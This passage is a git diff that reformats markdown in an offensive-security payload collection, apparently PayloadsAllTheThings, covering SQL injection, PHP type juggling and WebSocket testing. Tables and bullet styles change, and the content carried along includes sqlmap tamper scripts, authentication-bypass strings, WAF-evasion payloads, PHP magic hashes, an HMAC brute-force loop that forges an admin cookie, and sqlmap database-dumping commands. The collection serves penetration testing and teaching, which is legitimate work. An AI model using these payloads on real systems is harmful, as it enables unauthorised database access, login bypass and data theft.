followed by a random string and a new line ('\n') | -|space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | -|space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | -|space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | -|space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') | -|space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | -|space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') | -|space2plus.py | Replaces space character (' ') with plus ('+') | -|space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | -|symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) | -|unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | -|unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) | -|uppercase.py | Replaces each keyword character with upper case value 'INSERT'| -|varnish.py | Append a HTTP header 'X-originating-IP' | -|versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment | -|versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | -|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'| +| Tamper | Description | +| ---------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------- | --- | --- | +| 0x2char.py | Replaces each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),…) counterpart | +| apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart | +| apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart | +| appendnullbyte.py | Appends encoded NULL byte character at the end of payload | +| base64encode.py | Base64 all characters in a given payload | +| between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | +| bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator | +| chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) | +| charencode.py | URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) | +| charunicodeencode.py | Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) | +| charunicodeescape.py | Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) | +| commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' | +| commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' | +| commentbeforeparentheses.py | Prepends (inline) comment before parentheses (e.g. ( -> /\*\*/() | +| concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' | +| charencode.py | Url-encodes all characters in a given payload (not processing already encoded) | +| charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) | +| equaltolike.py | Replaces all occurrences of operator equal ('=') with operator 'LIKE' | +| escapequotes.py | Slash escape quotes (' and ") | +| greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart | +| halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword | +| htmlencode.py | HTML encode (using code points) all non-alphanumeric characters (e.g. ‘ -> ') | +| ifnull2casewhenisnull.py | Replaces instances like ‘IFNULL(A, B)’ with ‘CASE WHEN ISNULL(A) THEN (B) ELSE (A) END’ counterpart | +| ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' | +| informationschemacomment.py | Add an inline comment (/\*\*/) to the end of all occurrences of (MySQL) “information_schema” identifier | +| least.py | Replaces greater than operator (‘>’) with ‘LEAST’ counterpart | +| lowercase.py | Replaces each keyword character with lower case value (e.g. SELECT -> select) | +| modsecurityversioned.py | Embraces complete query with versioned comment | +| modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment | +| multiplespaces.py | Adds multiple spaces around SQL keywords | +| nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters | +| overlongutf8.py | Converts all characters in a given payload (not processing already encoded) | +| overlongutf8more.py | Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) | +| percentage.py | Adds a percentage sign ('%') in front of each character | +| plus2concat.py | Replaces plus operator (‘+’) with (MsSQL) function CONCAT() counterpart | +| plus2fnconcat.py | Replaces plus operator (‘+’) with (MsSQL) ODBC function {fn CONCAT()} counterpart | +| randomcase.py | Replaces each keyword character with random case value | +| randomcomments.py | Add random comments to SQL keywords | +| securesphere.py | Appends special crafted string | +| sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | +| space2comment.py | Replaces space character (' ') with comments | +| space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') | +| space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | +| space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | +| space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | +| space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') | +| space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | +| space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') | +| space2plus.py | Replaces space character (' ') with plus ('+') | +| space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | +| symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and | | ) | +| unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | +| unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) | +| uppercase.py | Replaces each keyword character with upper case value 'INSERT' | +| varnish.py | Append a HTTP header 'X-originating-IP' | +| versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment | +| versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | +| xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For' | ### SQLmap without SQL injection You can use SQLmap to access a database via its port instead of a URL. ```ps1 -sqlmap.py -d "mysql://user:pass@ip/database" --dump-all +sqlmap.py -d "mysql://user:pass@ip/database" --dump-all ``` ## Authentication bypass @@ -375,7 +372,7 @@ admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- -admin';-- azer +admin';-- azer admin" # admin"/* admin" or "1"="1 @@ -447,12 +444,11 @@ Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL After this, we can simply authenticate with “admin@example.com” and the password “qwerty”! ``` - ## Generic WAF Bypass ### White spaces alternatives -* No space allowed (`%20`) - bypass using whitespace alternatives +- No space allowed (`%20`) - bypass using whitespace alternatives ```sql ?id=1%09and%091=1%09-- ?id=1%0Dand%0D1=1%0D-- @@ -461,32 +457,31 @@ After this, we can simply authenticate with “admin@example.com” and the pass ?id=1%0Aand%0A1=1%0A-- ?id=1%A0and%A01=1%A0-- ``` -* No whitespace - bypass using comments +- No whitespace - bypass using comments ```sql ?id=1/*comment*/and/**/1=1/**/-- ``` -* No Whitespace - bypass using parenthesis +- No Whitespace - bypass using parenthesis ```sql ?id=(1)and(1)=(1)-- ``` -* Whitespace alternatives by DBMS +- Whitespace alternatives by DBMS ```sql -- Example of query where spaces were replaced by ascii characters above 0x80 ♀SELECT§*⌂FROM☺users♫WHERE♂1☼=¶1‼ ``` -| DBMS | ASCII characters in hexadicimal | -| ---------- | ------------------------------- | -| SQLite3 | 0A, 0D, 0C, 09, 20 | -| MySQL 5 | 09, 0A, 0B, 0C, 0D, A0, 20 | -| MySQL 3 | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0 | -| PostgreSQL | 0A, 0D, 0C, 09, 20 | -| Oracle 11g | 00, 0A, 0D, 0C, 09, 20 | -| MSSQL | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20 | +| DBMS | ASCII characters in hexadicimal | +| ---------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| SQLite3 | 0A, 0D, 0C, 09, 20 | +| MySQL 5 | 09, 0A, 0B, 0C, 0D, A0, 20 | +| MySQL 3 | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0 | +| PostgreSQL | 0A, 0D, 0C, 09, 20 | +| Oracle 11g | 00, 0A, 0D, 0C, 09, 20 | +| MSSQL | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20 | - ### No Comma Allowed - + Bypass using OFFSET, FROM and JOIN ```sql @@ -495,7 +490,6 @@ SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1). SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d ``` - ### No Equal Allowed Bypass using LIKE/NOT IN/IN/BETWEEN @@ -507,16 +501,15 @@ Bypass using LIKE/NOT IN/IN/BETWEEN ?id=1 and substring(version(),1,1) between 3 and 4 ``` - ### Case modification - -* Bypass using uppercase/lowercase (see keyword AND) + +- Bypass using uppercase/lowercase (see keyword AND) ```sql ?id=1 AND 1=1# ?id=1 AnD 1=1# ?id=1 aNd 1=1# ``` -* Bypass using keywords case insensitive / Bypass using an equivalent operator +- Bypass using keywords case insensitive / Bypass using an equivalent operator ```sql AND -> && OR -> || @@ -525,48 +518,46 @@ Bypass using LIKE/NOT IN/IN/BETWEEN WHERE -> HAVING ``` +## Labs -## Labs - -* [SQL injection vulnerability in WHERE clause allowing retrieval of hidden data](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data) -* [SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass) -* [SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding) -* [SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection) +- [SQL injection vulnerability in WHERE clause allowing retrieval of hidden data](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data) +- [SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass) +- [SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding) +- [SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection) ## References -* Detect SQLi - * [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/) - * [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/) -* MySQL: - * [PentestMonkey's mySQL injection cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet) - * [Reiners mySQL injection Filter Evasion Cheatsheet](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/) - * [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/) - * [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection) -* MSSQL: - * [EvilSQL's Error/Union/Blind MSSQL Cheatsheet](http://evilsql.com/main/page2.php) - * [PentestMonkey's MSSQL SQLi injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) -* ORACLE: - * [PentestMonkey's Oracle SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet) -* POSTGRESQL: - * [PentestMonkey's Postgres SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet) -* Others - * [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) - * [Access SQLi Cheatsheet](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html) - * [PentestMonkey's Ingres SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet) - * [Pentestmonkey's DB2 SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet) - * [Pentestmonkey's Informix SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet) - * [SQLite3 Injection Cheat sheet](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet) - * [Ruby on Rails (Active Record) SQL Injection Guide](http://rails-sqli.org/) - * [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html) - * [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/) - * [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/) -* Second Order: - * [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/) - * [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/) -* Sqlmap: - * [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560) -* WAF: - * [SQLi Optimization and Obfuscation Techniques](https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf) by Roberto Salgado - * [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/) - +- Detect SQLi + - [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/) + - [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/) +- MySQL: + - [PentestMonkey's mySQL injection cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet) + - [Reiners mySQL injection Filter Evasion Cheatsheet](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/) + - [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/) + - [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection) +- MSSQL: + - [EvilSQL's Error/Union/Blind MSSQL Cheatsheet](http://evilsql.com/main/page2.php) + - [PentestMonkey's MSSQL SQLi injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) +- ORACLE: + - [PentestMonkey's Oracle SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet) +- POSTGRESQL: + - [PentestMonkey's Postgres SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet) +- Others + - [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) + - [Access SQLi Cheatsheet](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html) + - [PentestMonkey's Ingres SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet) + - [Pentestmonkey's DB2 SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet) + - [Pentestmonkey's Informix SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet) + - [SQLite3 Injection Cheat sheet](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet) + - [Ruby on Rails (Active Record) SQL Injection Guide](http://rails-sqli.org/) + - [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html) + - [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/) + - [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/) +- Second Order: + - [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/) + - [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/) +- Sqlmap: + - [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560) +- WAF: + - [SQLi Optimization and Obfuscation Techniques](https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf) by Roberto Salgado + - [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/) diff --git a/Type Juggling/README.md b/Type Juggling/README.md index 944a041..19f212a 100644 --- a/Type Juggling/README.md +++ b/Type Juggling/README.md @@ -4,14 +4,13 @@ ## Summary -* [Loose Comparison](#loose-comparison) - * [True statements](#true-statements) - * [NULL statements](#null-statements) - * [Loose Comparison](#loose-comparison) -* [Magic Hashes](#magic-hashes) -* [Exploit](#exploit) -* [References](#references) - +- [Loose Comparison](#loose-comparison) + - [True statements](#true-statements) + - [NULL statements](#null-statements) + - [Loose Comparison](#loose-comparison) +- [Magic Hashes](#magic-hashes) +- [Exploit](#exploit) +- [References](#references) ## Loose Comparison @@ -22,62 +21,61 @@ ### True statements -| Statement | Output | -| --------------------------------- |:---------------:| -| `'0010e2' == '1e3'` | true | -| `'0xABCdef' == ' 0xABCdef'` | true (PHP 5.0) / false (PHP 7.0) | -| `'0xABCdef' == ' 0xABCdef'` | true (PHP 5.0) / false (PHP 7.0) | -| `'0x01' == 1` | true (PHP 5.0) / false (PHP 7.0) | -| `'0x1234Ab' == '1193131'` | true | -| `'123' == 123` | true | -| `'123a' == 123` | true | -| `'abc' == 0` | true | -| `'' == 0 == false == NULL` | true | -| `'' == 0` | true | -| `0 == false ` | true | -| `false == NULL` | true | -| `NULL == ''` | true | +| Statement | Output | +| ------------------------------- | :------------------------------: | +| `'0010e2' == '1e3'` | true | +| `'0xABCdef' == ' 0xABCdef'` | true (PHP 5.0) / false (PHP 7.0) | +| `'0xABCdef' == ' 0xABCdef'` | true (PHP 5.0) / false (PHP 7.0) | +| `'0x01' == 1` | true (PHP 5.0) / false (PHP 7.0) | +| `'0x1234Ab' == '1193131'` | true | +| `'123' == 123` | true | +| `'123a' == 123` | true | +| `'abc' == 0` | true | +| `'' == 0 == false == NULL` | true | +| `'' == 0` | true | +| `0 == false ` | true | +| `false == NULL` | true | +| `NULL == ''` | true | -> PHP8 won't try to cast string into numbers anymore, thanks to the Saner string to number comparisons RFC, meaning that collision with hashes starting with 0e and the likes are finally a thing of the past! The Consistent type errors for internal functions RFC will prevent things like `0 == strcmp($_GET['username'], $password)` bypasses, since strcmp won't return null and spit a warning any longer, but will throw a proper exception instead. +> PHP8 won't try to cast string into numbers anymore, thanks to the Saner string to number comparisons RFC, meaning that collision with hashes starting with 0e and the likes are finally a thing of the past! The Consistent type errors for internal functions RFC will prevent things like `0 == strcmp($_GET['username'], $password)` bypasses, since strcmp won't return null and spit a warning any longer, but will throw a proper exception instead. ![LooseTypeComparison](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png?raw=true) Loose Type Comparisons occurs in many languages: -* [MariaDB](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mariadb) -* [MySQL](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mysql) -* [NodeJS](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/NodeJS) -* [PHP](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/PHP) -* [Perl](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Perl) -* [Postgres](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Postgres) -* [Python](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Python) -* [SQLite](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/SQLite/2.6.0) +- [MariaDB](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mariadb) +- [MySQL](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mysql) +- [NodeJS](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/NodeJS) +- [PHP](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/PHP) +- [Perl](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Perl) +- [Postgres](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Postgres) +- [Python](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Python) +- [SQLite](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/SQLite/2.6.0) ### NULL statements -| Function | Statement | Output | -| -------- | -------------------------- |:---------------:| -| sha1 | `var_dump(sha1([]));` | NULL | -| md5 | `var_dump(md5([]));` | NULL | - +| Function | Statement | Output | +| -------- | --------------------- | :----: | +| sha1 | `var_dump(sha1([]));` | NULL | +| md5 | `var_dump(md5([]));` | NULL | ## Magic Hashes -> Magic hashes arise due to a quirk in PHP's type juggling, when comparing string hashes to integers. If a string hash starts with "0e" followed by only numbers, PHP interprets this as scientific notation and the hash is treated as a float in comparison operations. +> Magic hashes arise due to a quirk in PHP's type juggling, when comparing string hashes to integers. If a string hash starts with "0e" followed by only numbers, PHP interprets this as scientific notation and the hash is treated as a float in comparison operations. -| Hash | "Magic" Number / String | Magic Hash | Found By / Description | -| ---- | -------------------------- |:---------------------------------------------:| -------------:| -| MD4 | gH0nAdHk | 0e096229559581069251163783434175 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) | -| MD4 | if+hTai | 00e90130237707355082822449868597 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) | -| MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | -| MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | -| MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | -| MD5 | 0e215962017 | 0e291242476940776845150308577824 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | -| MD5 | 129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=? | -| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham | -| SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) | -| SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) | -| SHA-256 | TyNOQHUS | 0e66298694359207596086558843543959518835691168370379069085300385 | [@Chick3nman512](https://twitter.com/Chick3nman512/status/1150137800324526083) +| Hash | "Magic" Number / String | Magic Hash | Found By / Description | +| ------- | --------------------------------------- | :--------------------------------------------------------------: | -------------------------------------------------------------------------------: | +| MD4 | gH0nAdHk | 0e096229559581069251163783434175 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) | +| MD4 | IiF+hTai | 00e90130237707355082822449868597 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) | +| MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 0e215962017 | 0e291242476940776845150308577824 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=? | +| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham | +| SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) | +| SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) | +| SHA-256 | TyNOQHUS | 0e66298694359207596086558843543959518835691168370379069085300385 | [@Chick3nman512](https://twitter.com/Chick3nman512/status/1150137800324526083) | ```php - ``` + ```php + // docker run -it --rm -v /tmp/test:/usr/src/myapp -w /usr/src/myapp php:8.3.0alpha1-cli-buster php exp.php + for($i=1424869663; $i < 1835970773; $i++ ){ + $out = hash_hmac('md5', 'admin|'.$i, ''); + if(str_starts_with($out, '0e' )){ + if($out == 0){ + echo "$i - ".$out; + break; + } + } + } + ?> + ``` 3. Update the cookie data with the value from the bruteforce: `1539805986 - 0e772967136366835494939987377058` - ```php - $cookie = [ - 'username' => 'admin', - 'expiration' => 1539805986, - 'hmac' => '0' - ]; - ``` + ```php + $cookie = [ + 'username' => 'admin', + 'expiration' => 1539805986, + 'hmac' => '0' + ]; + ``` 4. In this case we assumed the key was a null string : `$key = '';` - ## References -* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html) -* [Magic Hashes - WhiteHatSec](https://www.whitehatsec.com/blog/magic-hashes/) -* [PHP Magic Tricks: Type Juggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf) -* [spaze/hashes - Magic hashes – PHP hash "collisions"](https://github.com/spaze/hashes) -* [(Super) Magic Hashes - Mon 07 October 2019 - myst404 (@myst404_)](https://offsec.almond.consulting/super-magic-hash.html) \ No newline at end of file +- [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html) +- [Magic Hashes - WhiteHatSec](https://www.whitehatsec.com/blog/magic-hashes/) +- [PHP Magic Tricks: Type Juggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf) +- [spaze/hashes - Magic hashes – PHP hash "collisions"](https://github.com/spaze/hashes) +- [(Super) Magic Hashes - Mon 07 October 2019 - myst404 (@myst404\_)](https://offsec.almond.consulting/super-magic-hash.html) diff --git a/Web Sockets/README.md b/Web Sockets/README.md index 4742444..7f27ae6 100644 --- a/Web Sockets/README.md +++ b/Web Sockets/README.md @@ -4,18 +4,18 @@ ## Summary -* [Tools](#tools) -* [Exploit](#exploit) - * [Using wsrepl](#using-wsrepl) - * [Using ws-harness.py](#using-ws-harness-py) -* [Cross-Site WebSocket Hijacking (CSWSH)](#cross-site-websocket-hijacking-cswsh) -* [Labs](#labs) -* [References](#references) +- [Tools](#tools) +- [Exploit](#exploit) + - [Using wsrepl](#using-wsrepl) + - [Using ws-harness.py](#using-ws-harness-py) +- [Cross-Site WebSocket Hijacking (CSWSH)](#cross-site-websocket-hijacking-cswsh) +- [Labs](#labs) +- [References](#references) ## Tools -* [doyensec/wsrepl](https://github.com/doyensec/wsrepl) - WebSocket REPL for pentesters -* [mfowl/ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py) +- [doyensec/wsrepl](https://github.com/doyensec/wsrepl) - WebSocket REPL for pentesters +- [mfowl/ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py) ## Exploit @@ -70,7 +70,6 @@ class Demo(Plugin): message.long = original ``` - ### Using ws-harness.py Start `ws-harness` to listen on a web-socket, and specify a message template to send to the endpoint. @@ -82,7 +81,7 @@ python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.tx The content of the message should contains the **[FUZZ]** keyword. ```json -{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"} +{ "auth_user": "dGVzda==", "auth_pass": "[FUZZ]" } ``` Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket. @@ -91,7 +90,6 @@ Then you can use any tools against the newly created web service, working as a p sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump ``` - ## Cross-Site WebSocket 